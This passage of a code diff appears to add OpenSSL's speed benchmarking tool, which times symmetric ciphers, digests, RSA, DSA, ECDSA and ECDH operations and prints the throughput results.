+                RC2_cbc_encrypt(buf, buf,
+                                (unsigned long)lengths[j], &rc2_ks,
+                                iv, RC2_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_RC2, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_RC5
+    if (doit[D_CBC_RC5]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_RC5], c[D_CBC_RC5][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_RC5][j]); count++)
+                RC5_32_cbc_encrypt(buf, buf,
+                                   (unsigned long)lengths[j], &rc5_ks,
+                                   iv, RC5_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_RC5, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_BF
+    if (doit[D_CBC_BF]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_BF], c[D_CBC_BF][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_BF][j]); count++)
+                BF_cbc_encrypt(buf, buf,
+                               (unsigned long)lengths[j], &bf_ks,
+                               iv, BF_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_BF, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_CAST
+    if (doit[D_CBC_CAST]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_CAST], c[D_CBC_CAST][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_CAST][j]); count++)
+                CAST_cbc_encrypt(buf, buf,
+                                 (unsigned long)lengths[j], &cast_ks,
+                                 iv, CAST_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_CAST, j, count, d);
+        }
+    }
+# endif
+
+    if (doit[D_EVP]) {
+# ifdef EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+        if (multiblock && evp_cipher) {
+            if (!
+                (EVP_CIPHER_flags(evp_cipher) &
+                 EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK)) {
+                fprintf(stderr, "%s is not multi-block capable\n",
+                        OBJ_nid2ln(evp_cipher->nid));
+                goto end;
+            }
+            multiblock_speed(evp_cipher);
+            mret = 0;
+            goto end;
+        }
+# endif
+        for (j = 0; j < SIZE_NUM; j++) {
+            if (evp_cipher) {
+                EVP_CIPHER_CTX ctx;
+                int outl;
+
+                names[D_EVP] = OBJ_nid2ln(evp_cipher->nid);
+                /*
+                 * -O3 -fschedule-insns messes up an optimization here!
+                 * names[D_EVP] somehow becomes NULL
+                 */
+                print_message(names[D_EVP], save_count, lengths[j]);
+
+                EVP_CIPHER_CTX_init(&ctx);
+                if (decrypt)
+                    EVP_DecryptInit_ex(&ctx, evp_cipher, NULL, key16, iv);
+                else
+                    EVP_EncryptInit_ex(&ctx, evp_cipher, NULL, key16, iv);
+                EVP_CIPHER_CTX_set_padding(&ctx, 0);
+
+                Time_F(START);
+                if (decrypt)
+                    for (count = 0, run = 1;
+                         COND(save_count * 4 * lengths[0] / lengths[j]);
+                         count++)
+                        EVP_DecryptUpdate(&ctx, buf, &outl, buf, lengths[j]);
+                else
+                    for (count = 0, run = 1;
+                         COND(save_count * 4 * lengths[0] / lengths[j]);
+                         count++)
+                        EVP_EncryptUpdate(&ctx, buf, &outl, buf, lengths[j]);
+                if (decrypt)
+                    EVP_DecryptFinal_ex(&ctx, buf, &outl);
+                else
+                    EVP_EncryptFinal_ex(&ctx, buf, &outl);
+                d = Time_F(STOP);
+                EVP_CIPHER_CTX_cleanup(&ctx);
+            }
+            if (evp_md) {
+                names[D_EVP] = OBJ_nid2ln(evp_md->type);
+                print_message(names[D_EVP], save_count, lengths[j]);
+
+                Time_F(START);
+                for (count = 0, run = 1;
+                     COND(save_count * 4 * lengths[0] / lengths[j]); count++)
+                    EVP_Digest(buf, lengths[j], &(md[0]), NULL, evp_md, NULL);
+
+                d = Time_F(STOP);
+            }
+            print_result(D_EVP, j, count, d);
+        }
+    }
+
+    RAND_pseudo_bytes(buf, 36);
+# ifndef OPENSSL_NO_RSA
+    for (j = 0; j < RSA_NUM; j++) {
+        int ret;
+        if (!rsa_doit[j])
+            continue;
+        ret = RSA_sign(NID_md5_sha1, buf, 36, buf2, &rsa_num, rsa_key[j]);
+        if (ret == 0) {
+            BIO_printf(bio_err,
+                       "RSA sign failure.  No RSA sign will be done.\n");
+            ERR_print_errors(bio_err);
+            rsa_count = 1;
+        } else {
+            pkey_print_message("private", "rsa",
+                               rsa_c[j][0], rsa_bits[j], RSA_SECONDS);
+            /* RSA_blinding_on(rsa_key[j],NULL); */
+            Time_F(START);
+            for (count = 0, run = 1; COND(rsa_c[j][0]); count++) {
+                ret = RSA_sign(NID_md5_sha1, buf, 36, buf2,
+                               &rsa_num, rsa_key[j]);
+                if (ret == 0) {
+                    BIO_printf(bio_err, "RSA sign failure\n");
+                    ERR_print_errors(bio_err);
+                    count = 1;
+                    break;
+                }
+            }
+            d = Time_F(STOP);
+            BIO_printf(bio_err,
+                       mr ? "+R1:%ld:%d:%.2f\n"
+                       : "%ld %d bit private RSA's in %.2fs\n",
+                       count, rsa_bits[j], d);
+            rsa_results[j][0] = d / (double)count;
+            rsa_count = count;
+        }
+
+#  if 1
+        ret = RSA_verify(NID_md5_sha1, buf, 36, buf2, rsa_num, rsa_key[j]);
+        if (ret <= 0) {
+            BIO_printf(bio_err,
+                       "RSA verify failure.  No RSA verify will be done.\n");
+            ERR_print_errors(bio_err);
+            rsa_doit[j] = 0;
+        } else {
+            pkey_print_message("public", "rsa",
+                               rsa_c[j][1], rsa_bits[j], RSA_SECONDS);
+            Time_F(START);
+            for (count = 0, run = 1; COND(rsa_c[j][1]); count++) {
+                ret = RSA_verify(NID_md5_sha1, buf, 36, buf2,
+                                 rsa_num, rsa_key[j]);
+                if (ret <= 0) {
+                    BIO_printf(bio_err, "RSA verify failure\n");
+                    ERR_print_errors(bio_err);
+                    count = 1;
+                    break;
+                }
+            }
+            d = Time_F(STOP);
+            BIO_printf(bio_err,
+                       mr ? "+R2:%ld:%d:%.2f\n"
+                       : "%ld %d bit public RSA's in %.2fs\n",
+                       count, rsa_bits[j], d);
+            rsa_results[j][1] = d / (double)count;
+        }
+#  endif
+
+        if (rsa_count <= 1) {
+            /* if longer than 10s, don't do any more */
+            for (j++; j < RSA_NUM; j++)
+                rsa_doit[j] = 0;
+        }
+    }
+# endif
+
+    RAND_pseudo_bytes(buf, 20);
+# ifndef OPENSSL_NO_DSA
+    if (RAND_status() != 1) {
+        RAND_seed(rnd_seed, sizeof rnd_seed);
+        rnd_fake = 1;
+    }
+    for (j = 0; j < DSA_NUM; j++) {
+        unsigned int kk;
+        int ret;
+
+        if (!dsa_doit[j])
+            continue;
+
+        /* DSA_generate_key(dsa_key[j]); */
+        /* DSA_sign_setup(dsa_key[j],NULL); */
+        ret = DSA_sign(EVP_PKEY_DSA, buf, 20, buf2, &kk, dsa_key[j]);
+        if (ret == 0) {
+            BIO_printf(bio_err,
+                       "DSA sign failure.  No DSA sign will be done.\n");
+            ERR_print_errors(bio_err);
+            rsa_count = 1;
+        } else {
+            pkey_print_message("sign", "dsa",
+                               dsa_c[j][0], dsa_bits[j], DSA_SECONDS);
+            Time_F(START);
+            for (count = 0, run = 1; COND(dsa_c[j][0]); count++) {
+                ret = DSA_sign(EVP_PKEY_DSA, buf, 20, buf2, &kk, dsa_key[j]);
+                if (ret == 0) {
+                    BIO_printf(bio_err, "DSA sign failure\n");
+                    ERR_print_errors(bio_err);
+                    count = 1;
+                    break;
+                }
+            }
+            d = Time_F(STOP);
+            BIO_printf(bio_err,
+                       mr ? "+R3:%ld:%d:%.2f\n"
+                       : "%ld %d bit DSA signs in %.2fs\n",
+                       count, dsa_bits[j], d);
+            dsa_results[j][0] = d / (double)count;
+            rsa_count = count;
+        }
+
+        ret = DSA_verify(EVP_PKEY_DSA, buf, 20, buf2, kk, dsa_key[j]);
+        if (ret <= 0) {
+            BIO_printf(bio_err,
+                       "DSA verify failure.  No DSA verify will be done.\n");
+            ERR_print_errors(bio_err);
+            dsa_doit[j] = 0;
+        } else {
+            pkey_print_message("verify", "dsa",
+                               dsa_c[j][1], dsa_bits[j], DSA_SECONDS);
+            Time_F(START);
+            for (count = 0, run = 1; COND(dsa_c[j][1]); count++) {
+                ret = DSA_verify(EVP_PKEY_DSA, buf, 20, buf2, kk, dsa_key[j]);
+                if (ret <= 0) {
+                    BIO_printf(bio_err, "DSA verify failure\n");
+                    ERR_print_errors(bio_err);
+                    count = 1;
+                    break;
+                }
+            }
+            d = Time_F(STOP);
+            BIO_printf(bio_err,
+                       mr ? "+R4:%ld:%d:%.2f\n"
+                       : "%ld %d bit DSA verify in %.2fs\n",
+                       count, dsa_bits[j], d);
+            dsa_results[j][1] = d / (double)count;
+        }
+
+        if (rsa_count <= 1) {
+            /* if longer than 10s, don't do any more */
+            for (j++; j < DSA_NUM; j++)
+                dsa_doit[j] = 0;
+        }
+    }
+    if (rnd_fake)
+        RAND_cleanup();
+# endif
+
+# ifndef OPENSSL_NO_ECDSA
+    if (RAND_status() != 1) {
+        RAND_seed(rnd_seed, sizeof rnd_seed);
+        rnd_fake = 1;
+    }
+    for (j = 0; j < EC_NUM; j++) {
+        int ret;
+
+        if (!ecdsa_doit[j])
+            continue;           /* Ignore Curve */
+        ecdsa[j] = EC_KEY_new_by_curve_name(test_curves[j]);
+        if (ecdsa[j] == NULL) {
+            BIO_printf(bio_err, "ECDSA failure.\n");
+            ERR_print_errors(bio_err);
+            rsa_count = 1;
+        } else {
+#  if 1
+            EC_KEY_precompute_mult(ecdsa[j], NULL);
+#  endif
+            /* Perform ECDSA signature test */
+            EC_KEY_generate_key(ecdsa[j]);
+            ret = ECDSA_sign(0, buf, 20, ecdsasig, &ecdsasiglen, ecdsa[j]);
+            if (ret == 0) {
+                BIO_printf(bio_err,
+                           "ECDSA sign failure.  No ECDSA sign will be done.\n");
+                ERR_print_errors(bio_err);
+                rsa_count = 1;
+            } else {
+                pkey_print_message("sign", "ecdsa",
+                                   ecdsa_c[j][0],
+                                   test_curves_bits[j], ECDSA_SECONDS);
+
+                Time_F(START);
+                for (count = 0, run = 1; COND(ecdsa_c[j][0]); count++) {
+                    ret = ECDSA_sign(0, buf, 20,
+                                     ecdsasig, &ecdsasiglen, ecdsa[j]);
+                    if (ret == 0) {
+                        BIO_printf(bio_err, "ECDSA sign failure\n");
+                        ERR_print_errors(bio_err);
+                        count = 1;
+                        break;
+                    }
+                }
+                d = Time_F(STOP);
+
+                BIO_printf(bio_err,
+                           mr ? "+R5:%ld:%d:%.2f\n" :
+                           "%ld %d bit ECDSA signs in %.2fs \n",
+                           count, test_curves_bits[j], d);
+                ecdsa_results[j][0] = d / (double)count;
+                rsa_count = count;
+            }
+
+            /* Perform ECDSA verification test */
+            ret = ECDSA_verify(0, buf, 20, ecdsasig, ecdsasiglen, ecdsa[j]);
+            if (ret != 1) {
+                BIO_printf(bio_err,
+                           "ECDSA verify failure.  No ECDSA verify will be done.\n");
+                ERR_print_errors(bio_err);
+                ecdsa_doit[j] = 0;
+            } else {
+                pkey_print_message("verify", "ecdsa",
+                                   ecdsa_c[j][1],
+                                   test_curves_bits[j], ECDSA_SECONDS);
+                Time_F(START);
+                for (count = 0, run = 1; COND(ecdsa_c[j][1]); count++) {
+                    ret =
+                        ECDSA_verify(0, buf, 20, ecdsasig, ecdsasiglen,
+                                     ecdsa[j]);
+                    if (ret != 1) {
+                        BIO_printf(bio_err, "ECDSA verify failure\n");
+                        ERR_print_errors(bio_err);
+                        count = 1;
+                        break;
+                    }
+                }
+                d = Time_F(STOP);
+                BIO_printf(bio_err,
+                           mr ? "+R6:%ld:%d:%.2f\n"
+                           : "%ld %d bit ECDSA verify in %.2fs\n",
+                           count, test_curves_bits[j], d);
+                ecdsa_results[j][1] = d / (double)count;
+            }
+
+            if (rsa_count <= 1) {
+                /* if longer than 10s, don't do any more */
+                for (j++; j < EC_NUM; j++)
+                    ecdsa_doit[j] = 0;
+            }
+        }
+    }
+    if (rnd_fake)
+        RAND_cleanup();
+# endif
+
+# ifndef OPENSSL_NO_ECDH
+    if (RAND_status() != 1) {
+        RAND_seed(rnd_seed, sizeof rnd_seed);
+        rnd_fake = 1;
+    }
+    for (j = 0; j < EC_NUM; j++) {
+        if (!ecdh_doit[j])
+            continue;
+        ecdh_a[j] = EC_KEY_new_by_curve_name(test_curves[j]);
+        ecdh_b[j] = EC_KEY_new_by_curve_name(test_curves[j]);
+        if ((ecdh_a[j] == NULL) || (ecdh_b[j] == NULL)) {
+            BIO_printf(bio_err, "ECDH failure.\n");
+            ERR_print_errors(bio_err);
+            rsa_count = 1;
+        } else {
+            /* generate two ECDH key pairs */
+            if (!EC_KEY_generate_key(ecdh_a[j]) ||
+                !EC_KEY_generate_key(ecdh_b[j])) {
+                BIO_printf(bio_err, "ECDH key generation failure.\n");
+                ERR_print_errors(bio_err);
+                rsa_count = 1;
+            } else {
+                /*
+                 * If field size is not more than 24 octets, then use SHA-1
+                 * hash of result; otherwise, use result (see section 4.8 of
+                 * draft-ietf-tls-ecc-03.txt).
+                 */
+                int field_size, outlen;
+                void *(*kdf) (const void *in, size_t inlen, void *out,
+                              size_t *xoutlen);
+                field_size =
+                    EC_GROUP_get_degree(EC_KEY_get0_group(ecdh_a[j]));
+                if (field_size <= 24 * 8) {
+                    outlen = KDF1_SHA1_len;
+                    kdf = KDF1_SHA1;
+                } else {
+                    outlen = (field_size + 7) / 8;
+                    kdf = NULL;
+                }
+                secret_size_a =
+                    ECDH_compute_key(secret_a, outlen,
+                                     EC_KEY_get0_public_key(ecdh_b[j]),
+                                     ecdh_a[j], kdf);
+                secret_size_b =
+                    ECDH_compute_key(secret_b, outlen,
+                                     EC_KEY_get0_public_key(ecdh_a[j]),
+                                     ecdh_b[j], kdf);
+                if (secret_size_a != secret_size_b)
+                    ecdh_checks = 0;
+                else
+                    ecdh_checks = 1;
+
+                for (secret_idx = 0; (secret_idx < secret_size_a)
+                     && (ecdh_checks == 1); secret_idx++) {
+                    if (secret_a[secret_idx] != secret_b[secret_idx])
+                        ecdh_checks = 0;
+                }
+
+                if (ecdh_checks == 0) {
+                    BIO_printf(bio_err, "ECDH computations don't match.\n");
+                    ERR_print_errors(bio_err);
+                    rsa_count = 1;
+                }
+
+                pkey_print_message("", "ecdh",
+                                   ecdh_c[j][0],
+                                   test_curves_bits[j], ECDH_SECONDS);
+                Time_F(START);
+                for (count = 0, run = 1; COND(ecdh_c[j][0]); count++) {
+                    ECDH_compute_key(secret_a, outlen,
+                                     EC_KEY_get0_public_key(ecdh_b[j]),
+                                     ecdh_a[j], kdf);
+                }
+                d = Time_F(STOP);
+                BIO_printf(bio_err,
+                           mr ? "+R7:%ld:%d:%.2f\n" :
+                           "%ld %d-bit ECDH ops in %.2fs\n", count,
+                           test_curves_bits[j], d);
+                ecdh_results[j][0] = d / (double)count;
+                rsa_count = count;
+            }
+        }
+
+        if (rsa_count <= 1) {
+            /* if longer than 10s, don't do any more */
+            for (j++; j < EC_NUM; j++)
+                ecdh_doit[j] = 0;
+        }
+    }
+    if (rnd_fake)
+        RAND_cleanup();
+# endif
+# ifndef NO_FORK
+ show_res:
+# endif
+    if (!mr) {
+        fprintf(stdout, "%s\n", SSLeay_version(SSLEAY_VERSION));
+        fprintf(stdout, "%s\n", SSLeay_version(SSLEAY_BUILT_ON));
+        printf("options:");
+        printf("%s ", BN_options());
+# ifndef OPENSSL_NO_MD2
+        printf("%s ", MD2_options());
+# endif
+# ifndef OPENSSL_NO_RC4
+        printf("%s ", RC4_options());
+# endif
+# ifndef OPENSSL_NO_DES
+        printf("%s ", DES_options());
+# endif
+# ifndef OPENSSL_NO_AES
+        printf("%s ", AES_options());
+# endif
+# ifndef OPENSSL_NO_IDEA
+        printf("%s ", idea_options());
+# endif
+# ifndef OPENSSL_NO_BF
+        printf("%s ", BF_options());
+# endif
+        fprintf(stdout, "\n%s\n", SSLeay_version(SSLEAY_CFLAGS));
+    }
+
+    if (pr_header) {
+        if (mr)
+            fprintf(stdout, "+H");
+        else {
+            fprintf(stdout,
+                    "The 'numbers' are in 1000s of bytes per second processed.\n");
+            fprintf(stdout, "type        ");
+        }
+        for (j = 0; j < SIZE_NUM; j++)
+            fprintf(stdout, mr ? ":%d" : "%7d bytes", lengths[j]);
+        fprintf(stdout, "\n");
+    }
+
+    for (k = 0; k < ALGOR_NUM; k++) {
+        if (!doit[k])
+            continue;
+        if (mr)
+            fprintf(stdout, "+F:%d:%s", k, names[k]);
+        else
+            fprintf(stdout, "%-13s", names[k]);
+        for (j = 0; j < SIZE_NUM; j++) {
+            if (results[k][j] > 10000 && !mr)
+                fprintf(stdout, " %11.2fk", results[k][j] / 1e3);
+            else
+                fprintf(stdout, mr ? ":%.2f" : " %11.2f ", results[k][j]);
+        }
+        fprintf(stdout, "\n");
+    }
+# ifndef OPENSSL_NO_RSA
+    j = 1;
+    for (k = 0; k < RSA_NUM; k++) {
+        if (!rsa_doit[k])
+            continue;
+        if (j && !mr) {
+            printf("%18ssign    verify    sign/s verify/s\n", " ");
+            j = 0;
+        }
+        if (mr)
+            fprintf(stdout, "+F2:%u:%u:%f:%f\n",
+                    k, rsa_bits[k], rsa_results[k][0], rsa_results[k][1]);
+        else
+            fprintf(stdout, "rsa %4u bits %8.6fs %8.6fs %8.1f %8.1f\n",
+                    rsa_bits[k], rsa_results[k][0], rsa_results[k][1],
+                    1.0 / rsa_results[k][0], 1.0 / rsa_results[k][1]);
+    }
+# endif
+# ifndef OPENSSL_NO_DSA
+    j = 1;
+    for (k = 0; k < DSA_NUM; k++) {
+        if (!dsa_doit[k])
+            continue;
+        if (j && !mr) {
+            printf("%18ssign    verify    sign/s verify/s\n", " ");
+            j = 0;
+        }
+        if (mr)
+            fprintf(stdout, "+F3:%u:%u:%f:%f\n",
+                    k, dsa_bits[k], dsa_results[k][0], dsa_results[k][1]);
+        else
+            fprintf(stdout, "dsa %4u bits %8.6fs %8.6fs %8.1f %8.1f\n",
+                    dsa_bits[k], dsa_results[k][0], dsa_results[k][1],
+                    1.0 / dsa_results[k][0], 1.0 / dsa_results[k][1]);
+    }
+# endif
+# ifndef OPENSSL_NO_ECDSA
+    j = 1;
+    for (k = 0; k < EC_NUM; k++) {
+        if (!ecdsa_doit[k])
+            continue;
+        if (j && !mr) {
+            printf("%30ssign    verify    sign/s verify/s\n", " ");
+            j = 0;
+        }
+
+        if (mr)
+            fprintf(stdout, "+F4:%u:%u:%f:%f\n",
+                    k, test_curves_bits[k],
+                    ecdsa_results[k][0], ecdsa_results[k][1]);
+        else
+            fprintf(stdout,
+                    "%4u bit ecdsa (%s) %8.4fs %8.4fs %8.1f %8.1f\n",
+                    test_curves_bits[k],
+                    test_curves_names[k],
+                    ecdsa_results[k][0], ecdsa_results[k][1],
+                    1.0 / ecdsa_results[k][0], 1.0 / ecdsa_results[k][1]);
+    }
+# endif
+
+# ifndef OPENSSL_NO_ECDH
+    j = 1;
+    for (k = 0; k < EC_NUM; k++) {
+        if (!ecdh_doit[k])
+            continue;
+        if (j && !mr) {
+            printf("%30sop      op/s\n", " ");
+            j = 0;
+        }
+        if (mr)
+            fprintf(stdout, "+F5:%u:%u:%f:%f\n",
+                    k, test_curves_bits[k],
+                    ecdh_results[k][0], 1.0 / ecdh_results[k][0]);
+
+        else
+            fprintf(stdout, "%4u bit ecdh (%s) %8.4fs %8.1f\n",
+                    test_curves_bits[k],
+                    test_curves_names[k],
+                    ecdh_results[k][0], 1.0 / ecdh_results[k][0]);
+    }
+# endif
+
+    mret = 0;
+
+ end:
+    ERR_print_errors(bio_err);
+    if (buf != NULL)
+        OPENSSL_free(buf);
+    if (buf2 != NULL)
+        OPENSSL_free(buf2);
+# ifndef OPENSSL_NO_RSA
+    for (i = 0; i < RSA_NUM; i++)
+        if (rsa_key[i] != NULL)
+            RSA_free(rsa_key[i]);
+# endif
+# ifndef OPENSSL_NO_DSA
+    for (i = 0; i < DSA_NUM; i++)
+        if (dsa_key[i] != NULL)
+            DSA_free(dsa_key[i]);
+# endif
+
+# ifndef OPENSSL_NO_ECDSA
+    for (i = 0; i < EC_NUM; i++)
+        if (ecdsa[i] != NULL)
+            EC_KEY_free(ecdsa[i]);
+# endif
+# ifndef OPENSSL_NO_ECDH
+    for (i = 0; i < EC_NUM; i++) {
+        if (ecdh_a[i] != NULL)
+            EC_KEY_free(ecdh_a[i]);
+        if (ecdh_b[i] != NULL)
+            EC_KEY_free(ecdh_b[i]);
+    }
+# endif
+
+    apps_shutdown();
+    OPENSSL_EXIT(mret);
+}
+
+static void print_message(const char *s, long num, int length)
+{
+# ifdef SIGALRM
+    BIO_printf(bio_err,
+               mr ? "+DT:%s:%d:%d\n"
+               : "Doing %s for %ds on %d size blocks: ", s, SECONDS, length);
+    (void)BIO_flush(bio_err);
+    alarm(SECONDS);
+# else
+    BIO_printf(bio_err,
+               mr ? "+DN:%s:%ld:%d\n"
+               : "Doing %s %ld times on %d size blocks: ", s, num, length);
+    (void)BIO_flush(bio_err);
+# endif
+# ifdef LINT
+    num = num;
+# endif
+}
+
+static void pkey_print_message(const char *str, const char *str2, long num,
+                               int bits, int tm)
+{
+# ifdef SIGALRM
+    BIO_printf(bio_err,
+               mr ? "+DTP:%d:%s:%s:%d\n"
+               : "Doing %d bit %s %s's for %ds: ", bits, str, str2, tm);
+    (void)BIO_flush(bio_err);
+    alarm(tm);
+# else
+    BIO_printf(bio_err,
+               mr ? "+DNP:%ld:%d:%s:%s\n"
+               : "Doing %ld %d bit %s %s's: ", num, bits, str, str2);
+    (void)BIO_flush(bio_err);
+# endif
+# ifdef LINT
+    num = num;
+# endif
+}
+
+static void print_result(int alg, int run_no, int count, double time_used)
+{
+    BIO_printf(bio_err,
+               mr ? "+R:%d:%s:%f\n"
+               : "%d %s's in %.2fs\n", count, names[alg], time_used);
+    results[alg][run_no] = ((double)count) / time_used * lengths[run_no];
+}
+
+# ifndef NO_FORK
+static char *sstrsep(char **string, const char *delim)
+{
+    char isdelim[256];
+    char *token = *string;
+
+    if (**string == 0)
+        return NULL;
+
+    memset(isdelim, 0, sizeof isdelim);
+    isdelim[0] = 1;
+
+    while (*delim) {
+        isdelim[(unsigned char)(*delim)] = 1;
+        delim++;
+    }
+
+    while (!isdelim[(unsigned char)(**string)]) {
+        (*string)++;
+    }
+
+    if (**string) {
+        **string = 0;
+        (*string)++;
+    }
+
+    return token;
+}
+
+static int do_multi(int multi)
+{
+    int n;
+    int fd[2];
+    int *fds;
+    static char sep[] = ":";
+
+    fds = malloc(multi * sizeof *fds);
+    for (n = 0; n < multi; ++n) {
+        if (pipe(fd) == -1) {
+            fprintf(stderr, "pipe failure\n");
+            exit(1);
+        }
+        fflush(stdout);
+        fflush(stderr);
+        if (fork()) {
+            close(fd[1]);
+            fds[n] = fd[0];
+        } else {
+            close(fd[0]);
+            close(1);
+            if (dup(fd[1]) == -1) {
+                fprintf(stderr, "dup failed\n");
+                exit(1);
+            }
+            close(fd[1]);
+            mr = 1;
+            usertime = 0;
+            free(fds);
+            return 0;
+        }
+        printf("Forked child %d\n", n);
+    }
+
+    /* for now, assume the pipe is long enough to take all the output */
+    for (n = 0; n < multi; ++n) {
+        FILE *f;
+        char buf[1024];
+        char *p;
+
+        f = fdopen(fds[n], "r");
+        while (fgets(buf, sizeof buf, f)) {
+            p = strchr(buf, '\n');
+            if (p)
+                *p = '\0';
+            if (buf[0] != '+') {
+                fprintf(stderr, "Don't understand line '%s' from child %d\n",
+                        buf, n);
+                continue;
+            }
+            printf("Got: %s from %d\n", buf, n);
+            if (!strncmp(buf, "+F:", 3)) {
+                int alg;
+                int j;
+
+                p = buf + 3;
+                alg = atoi(sstrsep(&p, sep));
+                sstrsep(&p, sep);
+                for (j = 0; j < SIZE_NUM; ++j)
+                    results[alg][j] += atof(sstrsep(&p, sep));
+            } else if (!strncmp(buf, "+F2:", 4)) {
+                int k;
+                double d;
+
+                p = buf + 4;
+                k = atoi(sstrsep(&p, sep));
+                sstrsep(&p, sep);
+
+                d = atof(sstrsep(&p, sep));
+                if (n)
+                    rsa_results[k][0] = 1 / (1 / rsa_results[k][0] + 1 / d);
+                else
+                    rsa_results[k][0] = d;
+
+                d = atof(sstrsep(&p, sep));
+                if (n)
+                    rsa_results[k][1] = 1 / (1 / rsa_results[k][1] + 1 / d);
+                else
+                    rsa_results[k][1] = d;
+            }
+#  ifndef OPENSSL_NO_DSA
+            else if (!strncmp(buf, "+F3:", 4)) {
+                int k;
+                double d;
+
+                p = buf + 4;
+                k = atoi(sstrsep(&p, sep));
+                sstrsep(&p, sep);
+
+                d = atof(sstrsep(&p, sep));
+                if (n)
+                    dsa_results[k][0] = 1 / (1 / dsa_results[k][0] + 1 / d);
+                else
+                    dsa_results[k][0] = d;
+
+                d = atof(sstrsep(&p, sep));
+                if (n)
+                    dsa_results[k][1] = 1 / (1 / dsa_results[k][1] + 1 / d);
+                else
+                    dsa_results[k][1] = d;
+            }
+#  endif
+#  ifndef OPENSSL_NO_ECDSA
+            else if (!strncmp(buf, "+F4:", 4)) {
+                int k;
+                double d;
+
+                p = buf + 4;
+                k = atoi(sstrsep(&p, sep));
+                sstrsep(&p, sep);
+
+                d = atof(sstrsep(&p, sep));
+                if (n)
+                    ecdsa_results[k][0] =
+                        1 / (1 / ecdsa_results[k][0] + 1 / d);
+                else
+                    ecdsa_results[k][0] = d;
+
+                d = atof(sstrsep(&p, sep));
+                if (n)
+                    ecdsa_results[k][1] =
+                        1 / (1 / ecdsa_results[k][1] + 1 / d);
+                else
+                    ecdsa_results[k][1] = d;
+            }
+#  endif
+
+#  ifndef OPENSSL_NO_ECDH
+            else if (!strncmp(buf, "+F5:", 4)) {
+                int k;
+                double d;
+
+                p = buf + 4;
+                k = atoi(sstrsep(&p, sep));
+                sstrsep(&p, sep);
+
+                d = atof(sstrsep(&p, sep));
+                if (n)
+                    ecdh_results[k][0] = 1 / (1 / ecdh_results[k][0] + 1 / d);
+                else
+                    ecdh_results[k][0] = d;
+
+            }
+#  endif
+
+            else if (!strncmp(buf, "+H:", 3)) {
+            } else
+                fprintf(stderr, "Unknown type '%s' from child %d\n", buf, n);
+        }
+
+        fclose(f);
+    }
+    free(fds);
+    return 1;
+}
+# endif
+
+static void multiblock_speed(const EVP_CIPHER *evp_cipher)
+{
+    static int mblengths[] =
+        { 8 * 1024, 2 * 8 * 1024, 4 * 8 * 1024, 8 * 8 * 1024, 8 * 16 * 1024 };
+    int j, count, num = sizeof(lengths) / sizeof(lengths[0]);
+    const char *alg_name;
+    unsigned char *inp, *out, no_key[32], no_iv[16];
+    EVP_CIPHER_CTX ctx;
+    double d = 0.0;
+
+    inp = OPENSSL_malloc(mblengths[num - 1]);
+    out = OPENSSL_malloc(mblengths[num - 1] + 1024);
+
+    EVP_CIPHER_CTX_init(&ctx);
+    EVP_EncryptInit_ex(&ctx, evp_cipher, NULL, no_key, no_iv);
+    EVP_CIPHER_CTX_ctrl(&ctx, EVP_CTRL_AEAD_SET_MAC_KEY, sizeof(no_key),
+                        no_key);
+    alg_name = OBJ_nid2ln(evp_cipher->nid);
+
+    for (j = 0; j < num; j++) {
+        print_message(alg_name, 0, mblengths[j]);
+        Time_F(START);
+        for (count = 0, run = 1; run && count < 0x7fffffff; count++) {
+            unsigned char aad[13];
+            EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM mb_param;
+            size_t len = mblengths[j];
+            int packlen;
+
+            memset(aad, 0, 8);  /* avoid uninitialized values */
+            aad[8] = 23;        /* SSL3_RT_APPLICATION_DATA */
+            aad[9] = 3;         /* version */
+            aad[10] = 2;
+            aad[11] = 0;        /* length */
+            aad[12] = 0;
+            mb_param.out = NULL;
+            mb_param.inp = aad;
+            mb_param.len = len;
+            mb_param.interleave = 8;
+
+            packlen = EVP_CIPHER_CTX_ctrl(&ctx,
+                                          EVP_CTRL_TLS1_1_MULTIBLOCK_AAD,
+                                          sizeof(mb_param), &mb_param);
+
+            if (packlen > 0) {
+                mb_param.out = out;
+                mb_param.inp = inp;
+                mb_param.len = len;
+                EVP_CIPHER_CTX_ctrl(&ctx,
+                                    EVP_CTRL_TLS1_1_MULTIBLOCK_ENCRYPT,
+                                    sizeof(mb_param), &mb_param);
+            } else {
+                int pad;
+
+                RAND_bytes(out, 16);
+                len += 16;
+                aad[11] = len >> 8;
+                aad[12] = len;
+                pad = EVP_CIPHER_CTX_ctrl(&ctx,
+                                          EVP_CTRL_AEAD_TLS1_AAD, 13, aad);
+                EVP_Cipher(&ctx, out, inp, len + pad);
+            }
+        }
+        d = Time_F(STOP);
+        BIO_printf(bio_err,
+                   mr ? "+R:%d:%s:%f\n"
+                   : "%d %s's in %.2fs\n", count, "evp", d);
+        results[D_EVP][j] = ((double)count) / d * mblengths[j];
+    }
+
+    if (mr) {
+        fprintf(stdout, "+H");
+        for (j = 0; j < num; j++)
+            fprintf(stdout, ":%d", mblengths[j]);
+        fprintf(stdout, "\n");
+        fprintf(stdout, "+F:%d:%s", D_EVP, alg_name);
+        for (j = 0; j < num; j++)
+            fprintf(stdout, ":%.2f", results[D_EVP][j]);
+        fprintf(stdout, "\n");
+    } else {
+        fprintf(stdout,
+                "The 'numbers' are in 1000s of bytes per second processed.\n");
+        fprintf(stdout, "type                    ");
+        for (j = 0; j < num; j++)
+            fprintf(stdout, "%7d bytes", mblengths[j]);
+        fprintf(stdout, "\n");
+        fprintf(stdout, "%-24s", alg_name);
+
+        for (j = 0; j < num; j++) {
+            if (results[D_EVP][j] > 10000)
+                fprintf(stdout, " %11.2fk", results[D_EVP][j] / 1e3);
+            else
